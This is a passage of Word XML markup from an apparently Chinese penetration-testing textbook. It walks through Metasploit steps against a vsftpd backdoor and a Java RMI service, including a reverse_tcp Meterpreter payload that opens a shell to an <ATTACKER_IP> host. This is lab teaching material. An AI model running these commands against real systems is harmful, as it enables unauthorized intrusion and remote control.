        <w:t xml:space="preserve">预期现象与参数解释</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代表目标主机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址，这是所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块必需的通用选项。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">show options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令会显示该模块当前所有配置项及其类型、是否必需、和当前的设定值。你会看到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已被设置。此时通常无需设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（远程端口），因为该模块已内置默认端口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（标准的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口）①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3：进行无害化检查（可选但强烈建议）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在执行真正攻击前，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令进行无灾探测。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象与排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令执行后，其反馈可能是简单的一句，明确指示目标是否存在漏洞。如果返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">The target is not vulnerable.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，可能的原因包括：IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址错误、目标防火墙阻断、目标实际为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsftpd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">其他非后门版本。此步骤体现了授权测试中“在按下扳机前确认”的专业素养。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4：配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">并执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看当前模块的默认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload，然后执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：你会看到一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">列表，末尾有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Staged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Inline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标识。该模块已自动选择了与之匹配的默认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload，通常是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd/unix/interact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这样一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令交互式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload。对于一个命令注入类漏洞，无需复杂的反连或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter，一个直接交互就足够了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">成功后的预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如果攻击成功，控制台会输出一段关键信息，表明已建立连接，随即出现类似</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的命令提示符，这意味着已经获得了一个绑定在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsftpd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务进程上下文中的远程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话。此时你可以在该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等系统命令来验证目标环境。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">此提示符的具体样式和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的功能，取决于被攻陷服务的权限和所使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">类型，为环境相关特征②，本书不编造精确的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示符输出。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit completed, but no session was created.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：这是最常见的错误。原因可能是目标不存在漏洞，或更常见的是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接被阻断。对于反向连接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），必须正确设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为攻击机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，且确保目标到攻击机的特定端口路由可达，无防火墙阻隔。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模块名称找不到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：请检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时的关键词，或使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后跟空格加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">号来加载条目。确认使用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本和数据库已更新（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfupdate</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5：尝试升级到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上述</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd/unix/interact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只是一个简单</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell。若要体验更高级的控制能力，我们可以在另一个漏洞（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java RMI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/multi/misc/java_rmi_server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）的实验中，主动选择一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行演示。其配置逻辑完全相同：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/multi/misc/java_rmi_server</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOSTS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> PAYLOAD java/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ATTACKER_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">成功后预期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：控制台显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter session X opened</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，并进入一个全新的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示符界面。在提示符后运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">help</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令，会展示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心命令集，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sysinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（获取系统信息）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（列出进程）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（退化并获取一个系统标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell）。这表明我们已获得一个功能远超标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的高级会话②。</w:t>
